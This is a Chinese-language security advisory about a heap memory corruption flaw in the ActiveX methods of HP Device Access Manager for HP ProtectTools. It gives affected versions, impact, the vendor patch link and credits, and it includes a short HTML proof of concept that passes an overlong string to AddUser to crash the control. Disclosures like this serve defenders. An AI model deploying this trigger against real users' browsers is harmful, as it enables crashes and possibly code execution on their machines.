HP Device Access Manager for HP ProtectTools堆内存破坏漏洞

漏洞起因
边界条件错误
危险等级

影响系统
HP Device Access Manager for HP ProtectTools 6.0.0.12
HP Device Access Manager for HP ProtectTools 5.0.0.5

不受影响系统
HP Device Access Manager for HP ProtectTools 6.1.0.1

危害
远程攻击者利用漏洞使应用程序崩溃。

攻击所需条件
攻击者必须构建恶意WEB页,诱使用户解析。

漏洞信息
HP Device Access Manager是一款能够让管理员来限制用户通过计算机可扩展设备(比如:USB键盘鼠标,闪存盘等)来获取数据的约束工具。
AddUser(), AddUserEx(), RemoveUser(), RemoveUserByGuide(), RemoveUserEx()和RemoveUserRegardless()方法没有正确检查SidString变量长度,攻击者可以构建恶意WEB页,使应用程序崩溃。可能以应用程序上下文执行任意代码。

测试方法
<HTML>
<BODY>
<object id=”target”
classid=”clsid:{1A6F1F9C-7986-4CAB-BD5E-0E0BC09DEE8B}”></object>
<SCRIPT language=”JavaScript”>
function Do_It()
{
arg1=String(1044, “X”)
target.AddUser arg1
}
</SCRIPT>
<input onclick=”Do_It()” type=”button” value=”P0c”>
</BODY>
</HTML>

厂商解决方案
用户可参考如下供应商提供的安全公告获得补丁信息:
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03082368

漏洞提供者
High-Tech Bridge SA Security Research Lab

发表评论?

0 条评论。

发表评论